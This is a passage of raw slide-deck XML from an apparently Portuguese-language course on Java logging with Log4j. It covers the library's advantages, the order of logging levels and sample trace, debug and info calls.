              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="413" name="Google Shape;413;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7820926" y="225400"/>
            <a:ext cx="1279852" cy="639926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847725" y="2800375"/>
            <a:ext cx="279000" cy="1323600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 50000"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15" name="Google Shape;415;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6260475" y="3191975"/>
            <a:ext cx="18375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rgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Níveis de logging</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>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9" name="Shape 419"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;420;p6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Vantagens do Log4j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(comparado com logging usando System.out.println)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>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
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1533475"/>
            <a:ext cx="8689500" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Níveis de log (trace, debug, info, etc)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Diferentes saídas (console, arquivos, BDs, etc)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Recursos para formatação das msgs</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Configuração em arquivo externo</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Melhor performance </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Google Shape;422;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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6" name="Shape 426"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Google Shape;427;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3688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N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>íveis de logging </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(em ordem de severidade ou importância do evento)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1762075"/>
            <a:ext cx="8520600" cy="759300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2600"/>
              <a:t>trace → debug → info → warn → error → fatal</a:t>
            </a:r>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Google Shape;429;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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30" name="Google Shape;430;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2101050" y="1283950"/>
            <a:ext cx="190500" cy="2246100"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 50000"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31" name="Google Shape;431;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727225" y="2621850"/>
            <a:ext cx="2933100" cy="738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800">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligados apenas durante o desenvolvimento </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="Google Shape;432;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5869075" y="259000"/>
            <a:ext cx="190500" cy="4296000"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 50000"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33" name="Google Shape;433;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855875" y="2621850"/>
            <a:ext cx="42564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800">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligados também em produção</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722550" y="3795075"/>
            <a:ext cx="7425600" cy="1098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800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objetivo: facilita configurar o nível de logging mais adequado para cada momento de uso do sistema; permite filtrar as msgs de interesse para análise (exemplo: apenas msgs com nível fatal)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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8" name="Shape 438"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="Google Shape;439;p6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2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trace</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detailed information about the execution flow or state</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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41" name="Google Shape;441;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460375" y="1246825"/>
            <a:ext cx="8362800" cy="400200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="999999"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.trace("Entering method getCustomerDetails with ID: {}", customerId);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Google Shape;442;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460375" y="2847025"/>
            <a:ext cx="8362800" cy="895800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="999999"/>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2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>for (int i = 0; i &lt; items.size(); i++) {</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    logger.trace("Processing item {}: {}", i, items.get(i));</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460375" y="1932625"/>
            <a:ext cx="8362800" cy="648000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="999999"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.trace("Exiting method getCustomerDetails with result: {}", customerDetails);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444" name="Google Shape;444;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779800" y="4214650"/>
            <a:ext cx="7511400" cy="7803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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Útil para entender o fluxo de execução de um sistema, quando ele é mais complexo ou desconhecido; descobrir problemas de desempenho</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>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8" name="Shape 448"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Google Shape;449;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2926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2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debug:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nformation useful for debugging, such as variable values or configurations</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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51" name="Google Shape;451;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="1323025"/>
            <a:ext cx="8362800" cy="400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2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.debug("Cache initialized with size: {}", cacheSize);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="452" name="Google Shape;452;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="2923225"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.debug("Selected option: {}", selectedOption);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="453" name="Google Shape;453;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="2085025"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.debug("User input: {}", userInput);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="Google Shape;454;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="623200" y="4062250"/>
            <a:ext cx="8075100" cy="7803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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inseridos para fins de depuração e entendimento da execução; se muito específicos, podem ser removidos do código ao término da depuração</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>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8" name="Shape 458"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Google Shape;459;p7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2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Info</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>significant events or milestones in the app's lifecycle</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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61" name="Google Shape;461;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="1704025"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.info("Application started successfully.");</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Google Shape;462;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="3532825"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.info("Order {} successfully processed.", orderId);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="2618425"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.info("User {} logged in at {}", username, loginTime);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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7" name="Shape 467"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
